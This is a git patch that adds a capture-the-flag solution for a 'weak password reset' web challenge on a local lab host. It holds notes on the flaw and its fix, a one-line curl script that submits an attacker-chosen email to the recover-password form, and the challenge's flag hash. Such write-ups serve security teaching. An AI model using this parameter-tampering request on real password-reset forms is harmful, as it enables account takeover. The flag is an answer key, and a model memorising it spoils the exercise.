From 7501efd7a8fd1dc4ba363e13f7cc33b491a8e5a4 Mon Sep 17 00:00:00 2001 From: Thomas Vanbesien Date: Thu, 26 Mar 2026 17:53:24 +0100 Subject: Add weak password reset functionalities solution --- Weak password reset functionalities/Resources/notes.md | 7 +++++++ Weak password reset functionalities/Resources/reset.bash | 1 + Weak password reset functionalities/flag | 1 + 3 files changed, 9 insertions(+) create mode 100644 Weak password reset functionalities/Resources/notes.md create mode 100755 Weak password reset functionalities/Resources/reset.bash create mode 100644 Weak password reset functionalities/flag diff --git a/Weak password reset functionalities/Resources/notes.md b/Weak password reset functionalities/Resources/notes.md new file mode 100644 index 0000000..bac2ecd --- /dev/null +++ b/Weak password reset functionalities/Resources/notes.md @@ -0,0 +1,7 @@ +## Exploit + +The `"mail"` field of the **Recover Password** page can be inspected and edited and anyone. Open `http://10.0.2.15/?page=recover` with Firefox and change the value of the `` element before submitting the request. Alternatively, one may also use a script like the one provided in `reset.bash`. + +## Fix + +The problem here is that the server is trusting a client-supplied address instead of looking it up server-side. The client should supply a username/account identifier and the server must match it against its email in the database. diff --git a/Weak password reset functionalities/Resources/reset.bash b/Weak password reset functionalities/Resources/reset.bash new file mode 100755 index 0000000..e60803e --- /dev/null +++ b/Weak password reset functionalities/Resources/reset.bash @@ -0,0 +1 @@ +curl --silent --data-urlencode mail=hacker@example.com --data Submit=Submit 'http://10.0.2.15/?page=recover' | grep flag diff --git a/Weak password reset functionalities/flag b/Weak password reset functionalities/flag new file mode 100644 index 0000000..b67bb13 --- /dev/null +++ b/Weak password reset functionalities/flag @@ -0,0 +1 @@ +1d4855f7337c0c14b6f44946872c4eb33853f40b2d54393fbe94f49f1e19bbb0 -- cgit v1.2.3